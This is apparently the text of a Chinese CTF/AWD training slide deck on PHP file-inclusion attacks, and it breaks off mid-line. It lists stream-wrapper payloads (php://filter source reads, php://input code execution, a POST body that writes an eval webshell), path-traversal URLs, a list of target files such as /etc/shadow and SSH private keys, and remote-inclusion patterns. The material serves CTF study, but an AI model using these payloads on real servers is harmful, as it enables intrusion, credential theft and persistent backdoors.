3.3、AWD安全攻防赛制PHP文件包含.pptxVIP

;01;文件包含;文件包含;文件包含;02;PHP伪协议;【file://协议】 file:// 协议在双off的情况下也可以正常使用； /cmd.php?file=file://D:/soft/phpStudy/WWW/phpcode.txt ;【php://协议】 不需要开启allow_url_fopen，仅php://input、 php://stdin、 php://memory 和 php://temp 需要开启allow_url_include。 php:// 访问各个输入/输出流（I/O streams），在CTF中经常使用的是php://filter和php://input，php://filter用于读取源码，php://input用于执行php代码。;【 php://filter 】 php://filter在双off的情况下也可以正常使用； /cmd.php?file=php://filter/read=convert.base64-encode/resource=./cmd.php 【 php://file 】 /cmd.php?file=php://input [POST DATA] ?php phpinfo()? 也可以POST如下内容生成一句话： ?php fputs(fopen(“shell.php”,”w”),’?php eval($_POST[cmd];?’);?;【zip://, bzip2://, zlib://协议】 zip://, bzip2://, zlib://协议在双off的情况下也可以正常使用； /cmd.php?file=zip://D:/soft/phpStudy/WWW/file.jpg%23phpcode.txt 【bzip2://协议】 compress.bzip2://file.bz2 /cmd.php?file=compress.bzip2://./file.jpg 【zlib://协议】 compress.zlib://file.gz /cmd.php?file=compress.zlib://./file.jpg;【data://协议】 经过测试官方文档上存在一处问题，经过测试PHP版本5.2，5.3，5.5，7.0；data:// 协议是是受限于allow_url_fopen的，官方文档上给出的是NO，所以要使用data://协议需要满足双on条件 /cmd.php?file=data://text/plain,?php phpinfo()? /cmd.php?file=data:text/plain,?php phpinfo()? /cmd.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4= /cmd.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=;【data://协议】 /web23/ ;03;普通本地文件包含利用;4、获取web目录或者其他配置文件： ?file=../../../../../../../../../usr/local/apache2/conf/httpd.conf 5、包含上传的附件： ?file=../attachment/media/xxx.file 6、读取session文件： ?file=../../../../../../tmp/sess_tnrdo9ub2tsdurntv0pdir1no7 （session文件一般在/tmp目录下，格式为sess_[your phpsessid value]，有时候也有可能在/var/lib/php5之类的，在此之前建议先读取配置文件。在某些特定的情况下如果你能够控制session的值，也许你能够获得一个shell）;7、如果拥有root权限还可以试试读这些东西： /root/.ssh/authorized_keys /root/.ssh/id_rsa /root/.ssh/id_rsa.keystore /root/.ssh/id_rsa.pub /root/.ssh/known_hosts /etc/shadow /root/.bash_history /root/.mysql_history /proc/self/fd/fd[0-9]* (文件标识符) /proc/mounts /proc/config.gz;远程代码执行： ?file=[http|https|ftp]:///shell.txt (需要allow_url_fopen=On并且 allow_url_include=On) 利用php流input： ?file=php://input (